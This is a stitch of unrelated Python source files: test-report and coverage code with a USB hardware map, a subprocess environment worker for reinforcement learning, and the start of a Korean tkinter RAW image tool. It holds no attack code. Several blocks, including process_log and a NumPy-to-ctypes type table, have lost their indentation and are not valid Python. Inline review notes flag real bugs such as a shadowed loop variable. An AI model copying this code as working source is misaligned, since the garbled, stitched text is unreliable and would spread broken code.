    """Emit one full xunit report per platform present in the instances."""
    platforms = {inst.platform.name for inst in self.instances.values()}
    for platform in platforms:
        if suffix:
            report = os.path.join(outdir, "{}_{}.xml".format(platform, suffix))
        else:
            report = os.path.join(outdir, "{}.xml".format(platform))
        self.xunit_report(report, platform, full_report=True, append=append)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False):
    """Write (or merge into) an xunit XML report.

    :param filename: output XML path.
    :param platform: restrict the report to one platform; otherwise
        every selected platform gets its own <testsuite>.
    :param full_report: report per-case results instead of one entry
        per instance.
    :param append: merge into an existing file, replacing re-run
        testcases instead of overwriting the whole report.
    :return: (fails, passes, errors, skips) of the LAST platform
        processed — NOTE(review): these counters are reset per
        platform, so the return value only reflects the final one.
    """
    total = 0
    if platform:
        selected = [platform]
    else:
        selected = self.selected_platforms

    # Re-use the existing tree when appending, otherwise start fresh.
    if os.path.exists(filename) and append:
        tree = ET.parse(filename)
        eleTestsuites = tree.getroot()
    else:
        eleTestsuites = ET.Element('testsuites')

    for p in selected:
        inst = self.get_platform_instances(p)
        fails = 0
        passes = 0
        errors = 0
        skips = 0
        duration = 0

        # First pass: accumulate per-platform counters.
        for _, instance in inst.items():
            handler_time = instance.metrics.get('handler_time', 0)
            duration += handler_time

            if full_report and not instance.build_only:
                # Count each individual case result.
                for k in instance.results.keys():
                    if instance.results[k] == 'PASS':
                        passes += 1
                    elif instance.results[k] == 'BLOCK':
                        errors += 1
                    elif instance.results[k] == 'SKIP':
                        skips += 1
                    else:
                        fails += 1
            else:
                # Count the instance-level status.
                if instance.status in ["error", "failed", "timeout"]:
                    if instance.reason in ['build_error', 'handler_crash']:
                        errors += 1
                    else:
                        fails += 1
                elif instance.status == 'skipped':
                    skips += 1
                elif instance.status == 'passed':
                    passes += 1
                else:
                    logger.error(f"Unknown status {instance.status}")

        total = (errors + passes + fails + skips)
        # do not produce a report if no tests were actually run (only built)
        if total == 0:
            continue

        run = p
        eleTestsuite = None

        # When we re-run the tests, we re-use the results and update only with
        # the newly run tests.
        if os.path.exists(filename) and append:
            ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
            if ts:
                eleTestsuite = ts[0]
                eleTestsuite.attrib['failures'] = "%d" % fails
                eleTestsuite.attrib['errors'] = "%d" % errors
                eleTestsuite.attrib['skipped'] = "%d" % skips
            else:
                logger.info(f"Did not find any existing results for {p}")
                eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
                                             name=run, time="%f" % duration,
                                             tests="%d" % (total),
                                             failures="%d" % fails,
                                             errors="%d" % (errors), skipped="%s" % (skips))
        else:
            eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
                                         name=run, time="%f" % duration,
                                         tests="%d" % (total),
                                         failures="%d" % fails,
                                         errors="%d" % (errors), skipped="%s" % (skips))

        # Second pass: emit one <testcase> element per case/instance.
        for _, instance in inst.items():
            if full_report:
                tname = os.path.basename(instance.testcase.name)
            else:
                tname = instance.testcase.id
            handler_time = instance.metrics.get('handler_time', 0)

            if full_report:
                for k in instance.results.keys():
                    # remove testcases that are being re-run from exiting reports
                    for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
                        eleTestsuite.remove(tc)

                    classname = ".".join(tname.split(".")[:2])
                    eleTestcase = ET.SubElement(
                        eleTestsuite, 'testcase',
                        classname=classname,
                        name="%s" % (k), time="%f" % handler_time)
                    if instance.results[k] in ['FAIL', 'BLOCK'] or \
                            (instance.build_only and instance.status in ["error", "failed", "timeout"]):
                        if instance.results[k] == 'FAIL':
                            el = ET.SubElement(
                                eleTestcase,
                                'failure',
                                type="failure",
                                message="failed")
                        else:
                            el = ET.SubElement(
                                eleTestcase,
                                'error',
                                type="failure",
                                message="failed")
                        # NOTE(review): `p` (platform name) is shadowed
                        # here by the log-path variable.
                        p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
                        log_file = os.path.join(p, "handler.log")
                        el.text = self.process_log(log_file)

                    elif instance.results[k] == 'PASS' \
                            or (instance.build_only and instance.status in ["passed"]):
                        pass
                    elif instance.results[k] == 'SKIP' \
                            or (instance.build_only and instance.status in ["skipped"]):
                        el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
                    else:
                        el = ET.SubElement(
                            eleTestcase,
                            'error',
                            type="error",
                            message=f"{instance.reason}")
            else:
                if platform:
                    classname = ".".join(instance.testcase.name.split(".")[:2])
                else:
                    classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])

                # remove testcases that are being re-run from exiting reports
                for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"]'):
                    eleTestsuite.remove(tc)

                eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
                                            classname=classname,
                                            name="%s" % (instance.testcase.name),
                                            time="%f" % handler_time)

                if instance.status in ["error", "failed", "timeout"]:
                    failure = ET.SubElement(
                        eleTestcase,
                        'failure',
                        type="failure",
                        message=instance.reason)

                    p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
                    bl = os.path.join(p, "build.log")
                    hl = os.path.join(p, "handler.log")
                    log_file = bl
                    # Prefer the handler log unless the failure was a
                    # build error (then only the build log is relevant).
                    if instance.reason != 'Build error':
                        if os.path.exists(hl):
                            log_file = hl
                        else:
                            log_file = bl

                    failure.text = self.process_log(log_file)

                elif instance.status == "skipped":
                    ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")

    result = ET.tostring(eleTestsuites)
    with open(filename, 'wb') as report:
        report.write(result)

    return fails, passes, errors, skips
def csv_report(self, filename):
    """Write a CSV summary of every instance (status, timing, sizes)."""
    fieldnames = ["test", "arch", "platform", "status",
                  "extra_args", "handler", "handler_time", "ram_size",
                  "rom_size"]
    with open(filename, "wt") as csvfile:
        cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
        cw.writeheader()
        for instance in self.instances.values():
            row = {
                "test": instance.testcase.name,
                "arch": instance.platform.arch,
                "platform": instance.platform.name,
                "extra_args": " ".join(instance.testcase.extra_args),
                "handler": instance.platform.simulation,
                "status": instance.status,
            }
            # Timing and size metrics are only meaningful for builds
            # that did not fail outright.
            if instance.status not in ["error", "failed", "timeout"]:
                if instance.handler:
                    row["handler_time"] = instance.metrics.get("handler_time", 0)
                row["ram_size"] = instance.metrics.get("ram_size", 0)
                row["rom_size"] = instance.metrics.get("rom_size", 0)
            cw.writerow(row)
def get_testcase(self, identifier):
    """Return every testcase containing a case named *identifier*.

    A testcase appears once per matching case (cases are expected to
    be unique within a testcase).
    """
    return [tc
            for tc in self.testcases.values()
            for case in tc.cases
            if case == identifier]
class CoverageTool:
    """ Base class for every supported coverage tool
    """

    def __init__(self):
        # Path to the gcov binary to use; set by the caller.
        self.gcov_tool = None
        # Source tree root used to scope/extract coverage data.
        self.base_dir = None

    @staticmethod
    def factory(tool):
        """Return a coverage-tool instance for *tool* ('lcov' or 'gcovr'),
        or None (after logging an error) for anything else."""
        if tool == 'lcov':
            t = Lcov()
        elif tool == 'gcovr':
            t = Gcovr()
        else:
            logger.error("Unsupported coverage tool specified: {}".format(tool))
            return None
        return t

    @staticmethod
    def retrieve_gcov_data(intput_file):
        """Extract the serialized gcov dump from a handler log.

        The log contains lines of the form "*<filename><<hexdump>"
        between GCOV_COVERAGE_DUMP_START and GCOV_COVERAGE_DUMP_END
        markers.

        :return: dict with 'complete' (bool — end marker seen, or no
            dump at all) and 'data' (mapping filename -> hex dump).
        """
        logger.debug("Working on %s" % intput_file)
        extracted_coverage_info = {}
        capture_data = False
        capture_complete = False
        with open(intput_file, 'r') as fp:
            for line in fp.readlines():
                if re.search("GCOV_COVERAGE_DUMP_START", line):
                    capture_data = True
                    continue
                if re.search("GCOV_COVERAGE_DUMP_END", line):
                    capture_complete = True
                    break
                # Loop until the coverage data is found.
                if not capture_data:
                    continue
                if line.startswith("*"):
                    sp = line.split("<")
                    if len(sp) > 1:
                        # Remove the leading delimiter "*"
                        file_name = sp[0][1:]
                        # Remove the trailing new line char
                        hex_dump = sp[1][:-1]
                    else:
                        continue
                else:
                    continue
                extracted_coverage_info.update({file_name: hex_dump})
        # A log with no dump at all is still considered "complete".
        if not capture_data:
            capture_complete = True
        return {'complete': capture_complete, 'data': extracted_coverage_info}

    @staticmethod
    def create_gcda_files(extracted_coverage_info):
        """Write each extracted hex dump back out as a binary .gcda file."""
        logger.debug("Generating gcda files")
        for filename, hexdump_val in extracted_coverage_info.items():
            # if kobject_hash is given for coverage gcovr fails
            # hence skipping it problem only in gcovr v4.1
            if "kobject_hash" in filename:
                filename = (filename[:-4]) + "gcno"
                try:
                    os.remove(filename)
                except Exception:
                    pass
                continue

            with open(filename, 'wb') as fp:
                fp.write(bytes.fromhex(hexdump_val))

    def generate(self, outdir):
        """Collect coverage from all handler logs under *outdir* and
        render an HTML report via the subclass's _generate()."""
        for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
            gcov_data = self.__class__.retrieve_gcov_data(filename)
            capture_complete = gcov_data['complete']
            extracted_coverage_info = gcov_data['data']
            if capture_complete:
                self.__class__.create_gcda_files(extracted_coverage_info)
                logger.debug("Gcov data captured: {}".format(filename))
            else:
                logger.error("Gcov data capture incomplete: {}".format(filename))

        with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
            ret = self._generate(outdir, coveragelog)
            if ret == 0:
                logger.info("HTML report generated: {}".format(
                    os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
    """Coverage backend driving lcov/genhtml."""

    def __init__(self):
        super().__init__()
        # lcov-style glob patterns to exclude from the report.
        self.ignores = []

    def add_ignore_file(self, pattern):
        """Exclude any path containing *pattern*."""
        self.ignores.append('*' + pattern + '*')

    def add_ignore_directory(self, pattern):
        """Exclude everything under the directory *pattern*."""
        self.ignores.append(pattern + '/*')

    def _generate(self, outdir, coveragelog):
        """Capture, filter and render coverage with lcov; return
        genhtml's exit status (0 on success)."""
        coveragefile = os.path.join(outdir, "coverage.info")
        ztestfile = os.path.join(outdir, "ztest.info")
        subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
                         "--capture", "--directory", outdir,
                         "--rc", "lcov_branch_coverage=1",
                         "--output-file", coveragefile], stdout=coveragelog)
        # We want to remove tests/* and tests/ztest/test/* but save tests/ztest
        subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
                         coveragefile,
                         os.path.join(self.base_dir, "tests", "ztest", "*"),
                         "--output-file", ztestfile,
                         "--rc", "lcov_branch_coverage=1"], stdout=coveragelog)

        if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
            subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
                             ztestfile,
                             os.path.join(self.base_dir, "tests/ztest/test/*"),
                             "--output-file", ztestfile,
                             "--rc", "lcov_branch_coverage=1"],
                            stdout=coveragelog)
            files = [coveragefile, ztestfile]
        else:
            files = [coveragefile]

        for i in self.ignores:
            subprocess.call(
                ["lcov", "--gcov-tool", self.gcov_tool, "--remove",
                 coveragefile, i, "--output-file",
                 coveragefile, "--rc", "lcov_branch_coverage=1"],
                stdout=coveragelog)

        # The --ignore-errors source option is added to avoid it exiting due to
        # samples/application_development/external_lib/
        return subprocess.call(["genhtml", "--legend", "--branch-coverage",
                                "--ignore-errors", "source",
                                "-output-directory",
                                os.path.join(outdir, "coverage")] + files,
                               stdout=coveragelog)
class Gcovr(CoverageTool):
    """Coverage backend driving gcovr."""

    def __init__(self):
        super().__init__()
        # gcovr-style regex patterns to exclude from the report.
        self.ignores = []

    def add_ignore_file(self, pattern):
        """Exclude any path containing *pattern*."""
        self.ignores.append('.*' + pattern + '.*')

    def add_ignore_directory(self, pattern):
        """Exclude everything under the directory *pattern*."""
        self.ignores.append(pattern + '/.*')

    @staticmethod
    def _interleave_list(prefix, list):
        """Return [prefix, item0, prefix, item1, ...] for building
        repeated command-line options.
        NOTE(review): the parameter name shadows the builtin `list`."""
        tuple_list = [(prefix, item) for item in list]
        return [item for sublist in tuple_list for item in sublist]

    def _generate(self, outdir, coveragelog):
        """Capture coverage to JSON, then render HTML with gcovr;
        return gcovr's exit status (0 on success)."""
        coveragefile = os.path.join(outdir, "coverage.json")
        ztestfile = os.path.join(outdir, "ztest.json")

        excludes = Gcovr._interleave_list("-e", self.ignores)

        # We want to remove tests/* and tests/ztest/test/* but save tests/ztest
        subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
                         self.gcov_tool, "-e", "tests/*"] + excludes +
                        ["--json", "-o", coveragefile, outdir],
                        stdout=coveragelog)

        subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
                         self.gcov_tool, "-f", "tests/ztest", "-e",
                         "tests/ztest/test/*", "--json", "-o", ztestfile,
                         outdir], stdout=coveragelog)

        if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
            files = [coveragefile, ztestfile]
        else:
            files = [coveragefile]

        subdir = os.path.join(outdir, "coverage")
        os.makedirs(subdir, exist_ok=True)

        tracefiles = self._interleave_list("--add-tracefile", files)

        return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
                                "--html-details"] + tracefiles +
                               ["-o", os.path.join(subdir, "index.html")],
                               stdout=coveragelog)
class HardwareMap:
    """Registry of debug probes / dev boards attached to the host.

    Devices are discovered by scanning USB serial ports (scan_hw), loaded
    from a schema-validated YAML map (load_hardware_map) or declared on the
    command line (load_device_from_cmdline); maps can be persisted back to
    YAML (write_map) and pretty-printed (dump).
    """

    # Schema used to validate hardware-map YAML files.
    schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")

    # USB manufacturer strings recognised as boards / debug probes.
    manufacturer = [
        'ARM',
        'SEGGER',
        'MBED',
        'STMicroelectronics',
        'Atmel Corp.',
        'Texas Instruments',
        'Silicon Labs',
        'NXP Semiconductors',
        'Microchip Technology Inc.',
        'FTDI',
        'Digilent'
    ]

    # Runner name -> USB product strings (exact names or regexes) it drives.
    runner_mapping = {
        'pyocd': [
            'DAPLink CMSIS-DAP',
            'MBED CMSIS-DAP'
        ],
        'jlink': [
            'J-Link',
            'J-Link OB'
        ],
        'openocd': [
            'STM32 STLink', '^XDS110.*', 'STLINK-V3'
        ],
        'dediprog': [
            'TTL232R-3V3',
            'MCP2200 USB Serial Port Emulator'
        ]
    }

    def __init__(self):
        self.detected = []            # devices found by scan_hw()
        self.connected_hardware = []  # devices declared/loaded for this run

    def load_device_from_cmdline(self, serial, platform, is_pty):
        """Register a single device described on the command line.

        ``serial`` is either a device node or a pty command, selected by
        ``is_pty``; ``platform`` is the board name to run tests on.
        """
        device = {
            "serial": None,
            "platform": platform,
            "serial_pty": None,
            "counter": 0,
            "available": True,
            "connected": True
        }
        if is_pty:
            device['serial_pty'] = serial
        else:
            device['serial'] = serial
        self.connected_hardware.append(device)

    def load_hardware_map(self, map_file):
        """Load and schema-validate a hardware map YAML file."""
        hwm_schema = scl.yaml_load(self.schema_path)
        self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
        for i in self.connected_hardware:
            i['counter'] = 0  # usage counter, reset for this run

    def scan_hw(self, persistent=False):
        """Scan USB serial ports for known probes and fill self.detected."""
        from serial.tools import list_ports

        if persistent and platform.system() == 'Linux':
            # On Linux, /dev/serial/by-id provides symlinks to
            # '/dev/ttyACMx' nodes using names which are unique as
            # long as manufacturers fill out USB metadata nicely.
            #
            # This creates a map from '/dev/ttyACMx' device nodes
            # to '/dev/serial/by-id/usb-...' symlinks. The symlinks
            # go into the hardware map because they stay the same
            # even when the user unplugs / replugs the device.
            #
            # Some inexpensive USB/serial adapters don't result
            # in unique names here, though, so use of this feature
            # requires explicitly setting persistent=True.
            by_id = Path('/dev/serial/by-id')

            def readlink(link):
                return str((by_id / link).resolve())

            persistent_map = {readlink(link): str(link)
                              for link in by_id.iterdir()}
        else:
            persistent_map = {}

        serial_devices = list_ports.comports()
        logger.info("Scanning connected hardware...")
        for d in serial_devices:
            if d.manufacturer in self.manufacturer:
                # TI XDS110 can have multiple serial devices for a single board
                # assume endpoint 0 is the serial, skip all others
                if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
                    continue
                s_dev = {}
                s_dev['platform'] = "unknown"
                s_dev['id'] = d.serial_number
                s_dev['serial'] = persistent_map.get(d.device, d.device)
                s_dev['product'] = d.product
                s_dev['runner'] = 'unknown'
                # Iterate items() directly instead of the former redundant
                # items()/get() double lookup per runner.
                for runner, products in self.runner_mapping.items():
                    if d.product in products:
                        s_dev['runner'] = runner
                        # NOTE(review): 'continue' moves to the *next* runner,
                        # so a later runner's regex could still overwrite this
                        # exact match — confirm whether 'break' was intended.
                        continue
                    # Try regex matching
                    for p in products:
                        if re.match(p, d.product):
                            s_dev['runner'] = runner
                s_dev['available'] = True
                s_dev['connected'] = True
                self.detected.append(s_dev)
            else:
                logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))

    def write_map(self, hwm_file):
        """Merge self.detected into hwm_file (or create it) and log the result."""
        # use existing map
        if os.path.exists(hwm_file):
            with open(hwm_file, 'r') as yaml_file:
                hwm = yaml.load(yaml_file, Loader=SafeLoader)
            hwm.sort(key=lambda x: x['serial'] or '')
            # disconnect everything
            for h in hwm:
                h['connected'] = False
                h['serial'] = None
            self.detected.sort(key=lambda x: x['serial'] or '')
            # Re-attach each detected device to the first unclaimed map entry
            # with the same id/product.
            for d in self.detected:
                for h in hwm:
                    if d['id'] == h['id'] and d['product'] == h['product'] and not h['connected'] and not d.get('match', False):
                        h['connected'] = True
                        h['serial'] = d['serial']
                        d['match'] = True
            # Devices that matched no existing entry are appended as new rows.
            new = list(filter(lambda n: not n.get('match', False), self.detected))
            hwm = hwm + new
            logger.info("Registered devices:")
            self.dump(hwm)
            with open(hwm_file, 'w') as yaml_file:
                yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
        else:
            # create new file
            with open(hwm_file, 'w') as yaml_file:
                yaml.dump(self.detected, yaml_file, Dumper=Dumper, default_flow_style=False)
            logger.info("Detected devices:")
            self.dump(self.detected)

    @staticmethod
    def dump(hwmap=None, filtered=None, header=None, connected_only=False):
        """Print a table of devices, optionally filtered by platform name.

        BUG FIX: the former signature used mutable default arguments
        (hwmap=[], filtered=[], header=[]); None sentinels keep the exact
        same call behavior without the shared-state pitfall.
        """
        hwmap = hwmap or []
        filtered = filtered or []
        print("")
        table = []
        if not header:
            header = ["Platform", "ID", "Serial device"]
        for p in sorted(hwmap, key=lambda i: i['platform']):
            platform = p.get('platform')
            connected = p.get('connected', False)
            if filtered and platform not in filtered:
                continue
            if not connected_only or connected:
                table.append([platform, p.get('id', None), p.get('serial')])
        print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
    """Log a per-section size table followed by ROM/RAM totals for *sc*.

    *sc* is expected to expose ``filename``, ``sections`` (list of dicts
    with name/virt_addr/load_addr/size/type), ``rom_size`` and ``ram_size``.
    """
    logger.info(sc.filename)
    logger.info("SECTION NAME             VMA        LMA     SIZE  HEX SZ TYPE")
    # Iterate the sections directly instead of indexing via range(len(...)).
    for v in sc.sections:
        logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
                    (v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
                     v["type"]))

    logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
                (sc.rom_size, sc.ram_size))
    logger.info("")
def export_tests(filename, tests):
    """Write dotted test identifiers to *filename* as CSV rows.

    Each id of the form ``section.sub_section`` becomes a row with a
    capitalized section, a title-cased subsection, and the full id as both
    title and reference. Ids without a dot are logged and skipped.
    """
    fieldnames = ['section', 'subsection', 'title', 'reference']
    with open(filename, "wt") as csvfile:
        writer = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
        for test in tests:
            parts = test.split(".")
            if len(parts) <= 1:
                logger.info("{} can't be exported".format(test))
                continue
            writer.writerow({
                "section": parts[0].capitalize(),
                "subsection": " ".join(parts[1].split("_")).title(),
                "title": test,
                "reference": test,
            })
|
subproc.py | import gym
import time
import ctypes
import numpy as np
from collections import OrderedDict
from multiprocessing.context import Process
from multiprocessing import Array, Pipe, connection
from typing import Callable, Any, List, Tuple, Optional
from tianshou.env.worker import EnvWorker
from tianshou.env.utils import CloudpickleWrapper
def _worker(parent, p, env_fn_wrapper, obs_bufs=None):
    """Subprocess loop: build the env and serve commands arriving on pipe ``p``.

    ``parent`` is the parent end of the pipe and is closed immediately in the
    child. ``obs_bufs`` (optional) holds shared-memory buffers; when given,
    observations are written into them and ``None`` is sent back over the
    pipe instead of the observation itself.
    """
    def _encode_obs(obs, buffer):
        # Recursively mirror the observation structure into the shared
        # buffer(s): ndarray -> ShArray.save, tuple/dict -> element-wise.
        if isinstance(obs, np.ndarray):
            buffer.save(obs)
        elif isinstance(obs, tuple):
            for o, b in zip(obs, buffer):
                _encode_obs(o, b)
        elif isinstance(obs, dict):
            for k in obs.keys():
                _encode_obs(obs[k], buffer[k])
        # Deliberately returns None: the parent reads the observation back
        # out of the shared buffers, so only None travels over the pipe.
        return None
    parent.close()
    env = env_fn_wrapper.data()
    try:
        while True:
            try:
                cmd, data = p.recv()
            except EOFError:  # the pipe has been closed
                p.close()
                break
            if cmd == 'step':
                obs, reward, done, info = env.step(data)
                if obs_bufs is not None:
                    obs = _encode_obs(obs, obs_bufs)
                p.send((obs, reward, done, info))
            elif cmd == 'reset':
                obs = env.reset()
                if obs_bufs is not None:
                    obs = _encode_obs(obs, obs_bufs)
                p.send(obs)
            elif cmd == 'close':
                p.send(env.close())
                p.close()
                break
            elif cmd == 'render':
                # Optional protocol members answer None when the env lacks them.
                p.send(env.render(**data) if hasattr(env, 'render') else None)
            elif cmd == 'seed':
                p.send(env.seed(data) if hasattr(env, 'seed') else None)
            elif cmd == 'getattr':
                p.send(getattr(env, data) if hasattr(env, data) else None)
            else:
                p.close()
                raise NotImplementedError
    except KeyboardInterrupt:
        p.close()
_NP_TO_CT = {
np.bool: ctypes.c_bool,
np.bool_: ctypes.c_bool,
np.uint8: ctypes.c_uint8,
np.uint16: ctypes.c_uint16,
np.uint32: ctypes.c_uint32,
np.uint64: ctypes.c_uint64,
np.int8: ctypes.c_int8,
np.int16: ctypes.c_int16,
np.int32: ctypes.c_int32,
np.int64: ctypes.c_int64,
np.float32: ctypes.c_float,
np.float64: ctypes.c_double,
}
class ShArray:
    """Wrapper of multiprocessing Array.

    Exposes a fixed-shape numpy view over a process-shared ctypes buffer:
    ``save`` copies an ndarray in, ``get`` returns a view of the contents.
    """

    def __init__(self, dtype, shape):
        element_count = int(np.prod(shape))
        self.arr = Array(_NP_TO_CT[dtype.type], element_count)
        self.dtype = dtype
        self.shape = shape

    def _as_ndarray(self):
        # Zero-copy ndarray view over the shared ctypes buffer.
        return np.frombuffer(self.arr.get_obj(),
                             dtype=self.dtype).reshape(self.shape)

    def save(self, ndarray):
        """Copy *ndarray* into the shared buffer (shape/dtype must match)."""
        assert isinstance(ndarray, np.ndarray)
        np.copyto(self._as_ndarray(), ndarray)

    def get(self):
        """Return an ndarray view of the shared buffer's current contents."""
        return self._as_ndarray()
def _setup_buf(space):
    """Recursively allocate shared-memory buffers mirroring a gym space.

    Dict spaces become dicts of buffers, Tuple spaces become tuples, and
    leaf spaces become a single ShArray sized from the space's dtype/shape.
    """
    if isinstance(space, gym.spaces.Dict):
        assert isinstance(space.spaces, OrderedDict)
        return {name: _setup_buf(sub) for name, sub in space.spaces.items()}
    if isinstance(space, gym.spaces.Tuple):
        assert isinstance(space.spaces, tuple)
        return tuple(_setup_buf(sub) for sub in space.spaces)
    return ShArray(space.dtype, space.shape)
class SubprocEnvWorker(EnvWorker):
    """Subprocess worker used in SubprocVectorEnv and ShmemVectorEnv."""

    def __init__(self, env_fn: Callable[[], gym.Env],
                 share_memory=False) -> None:
        super().__init__(env_fn)
        self.parent_remote, self.child_remote = Pipe()
        self.share_memory = share_memory
        self.buffer = None
        if self.share_memory:
            # Probe the env once to learn its observation space, then build
            # shared-memory buffers matching that space's structure.
            dummy = env_fn()
            obs_space = dummy.observation_space
            dummy.close()
            del dummy
            self.buffer = _setup_buf(obs_space)
        args = (self.parent_remote, self.child_remote,
                CloudpickleWrapper(env_fn), self.buffer)
        # daemon=True so a crashed main process does not leave orphans.
        self.process = Process(target=_worker, args=args, daemon=True)
        self.process.start()
        # The child keeps its own copy of child_remote; close ours so EOF
        # propagates correctly when either side goes away.
        self.child_remote.close()

    def __getattr__(self, key: str):
        # Forward unknown attribute lookups to the env in the subprocess.
        # NOTE(review): triggered for *any* attribute missing on this object,
        # which blocks until the worker replies — confirm that is intended.
        self.parent_remote.send(['getattr', key])
        return self.parent_remote.recv()

    def _decode_obs(self, isNone):
        # Rebuild an observation from the shared buffers. The ``isNone``
        # argument (the placeholder received over the pipe) is unused here.
        def decode_obs(buffer):
            if isinstance(buffer, ShArray):
                return buffer.get()
            elif isinstance(buffer, tuple):
                return tuple([decode_obs(b) for b in buffer])
            elif isinstance(buffer, dict):
                return {k: decode_obs(v) for k, v in buffer.items()}
            else:
                raise NotImplementedError
        return decode_obs(self.buffer)

    def reset(self) -> Any:
        """Reset the env and return its initial observation."""
        self.parent_remote.send(['reset', None])
        obs = self.parent_remote.recv()
        if self.share_memory:
            obs = self._decode_obs(obs)
        return obs

    @staticmethod
    def wait(workers: List['SubprocEnvWorker'],
             wait_num: int,
             timeout: Optional[float] = None) -> List['SubprocEnvWorker']:
        """Block until at least ``wait_num`` workers have a result ready
        (or ``timeout`` elapses) and return those workers."""
        conns, ready_conns = [x.parent_remote for x in workers], []
        remain_conns = conns
        t1 = time.time()
        while len(remain_conns) > 0 and len(ready_conns) < wait_num:
            if timeout:
                # Shrink the remaining budget each pass.
                remain_time = timeout - (time.time() - t1)
                if remain_time <= 0:
                    break
            else:
                remain_time = timeout
            remain_conns = [conn for conn in remain_conns
                            if conn not in ready_conns]
            new_ready_conns = connection.wait(
                remain_conns, timeout=remain_time)
            ready_conns.extend(new_ready_conns)
        return [workers[conns.index(con)] for con in ready_conns]

    def send_action(self, action: np.ndarray) -> None:
        """Dispatch a step command without waiting for the result."""
        self.parent_remote.send(['step', action])

    def get_result(self) -> Tuple[
            np.ndarray, np.ndarray, np.ndarray, np.ndarray]:
        """Collect the (obs, rew, done, info) tuple of a prior send_action."""
        obs, rew, done, info = self.parent_remote.recv()
        if self.share_memory:
            obs = self._decode_obs(obs)
        return obs, rew, done, info

    def seed(self, seed: Optional[int] = None) -> List[int]:
        self.parent_remote.send(['seed', seed])
        return self.parent_remote.recv()

    def render(self, **kwargs) -> Any:
        self.parent_remote.send(['render', kwargs])
        return self.parent_remote.recv()

    def close_env(self) -> None:
        try:
            self.parent_remote.send(['close', None])
            # mp may be deleted so it may raise AttributeError
            self.parent_remote.recv()
            self.process.join()
        except (BrokenPipeError, EOFError, AttributeError):
            pass
        # ensure the subproc is terminated
        self.process.terminate()
|
Project1 Image Processing Raw.py | ################################### - 권장1 : GrayScale 영상 처리 및 데이터 분석 툴 제작 ##################################
from tkinter import *; import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
import operator
import threading
## 함수 선언부
def loadImage(fname) :
    """Load a square 8-bit grayscale RAW file into the global input image.

    The side length is derived from the file size (side = sqrt(size)), so
    RAW files are assumed square. Fills the globals inImage/inW/inH and also
    returns the loaded 2-D pixel list (rows of ints in 0..255).
    """
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    fsize = os.path.getsize(fname)     # file size determines the geometry
    inH = inW = int(math.sqrt(fsize))  # assume a square image
    # Read the whole file in one call instead of one ord(fp.read(1)) per
    # pixel, and close it deterministically with a context manager.
    with open(fname, 'rb') as fp:
        raw = fp.read(inH * inW)
    # Slice the flat byte buffer into inH rows of inW pixel values.
    inImage = [list(raw[row * inW:(row + 1) * inW]) for row in range(inH)]
    return inImage
def openFile() :
    """Ask the user for a RAW file, load it, and display it unmodified."""
    global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
    filename = askopenfilename(parent=window,
                               filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
    loadImage(filename)  # file --> input memory
    equal()  # input memory --> output memory (identity transform + display)
def display() :
    """Render the global output image onto a fresh canvas.

    Pixel writing runs on a background thread so the UI stays responsive
    while the (slow) per-pixel PhotoImage updates happen.
    """
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Tear down the previous canvas, if any.
    if canvas != None :
        canvas.destroy()
    # Prepare the window/canvas/paper sized to the output image.
    window.geometry(str(outH) + 'x' + str(outW))
    canvas = Canvas(window, width=outW, height=outH)
    paper = PhotoImage(width=outW, height=outH)
    canvas.create_image((outW/2, outH/2), image=paper, state='normal')
    # Paint every pixel as a gray '#rrggbb' value.
    def putPixel() :
        for i in range(0, outH) :
            for k in range(0, outW) :
                data = outImage[i][k]
                paper.put('#%02x%02x%02x' % (data, data, data), (k,i))
    threading.Thread(target=putPixel).start()  # paint off the main thread
    canvas.pack()
#
def equal() :
    """Identity transform: copy the input image to the output unchanged."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Output geometry matches the input.
    outW = inW
    outH = inH
    # Row-by-row copy of the input pixels into a fresh output buffer.
    outImage = [list(row) for row in inImage]
    display()
#[화소점처리 알고리즘]
#[Point-processing algorithms]
def addImage(num) :
    """Apply a per-pixel point operation selected by *num* and display it.

    1=brighten(+), 2=darken(-), 3=brighten(*), 4=darken(//);
    5-13 (AND/OR/XOR/invert/gamma/parabola/binarize/range-emphasis) are
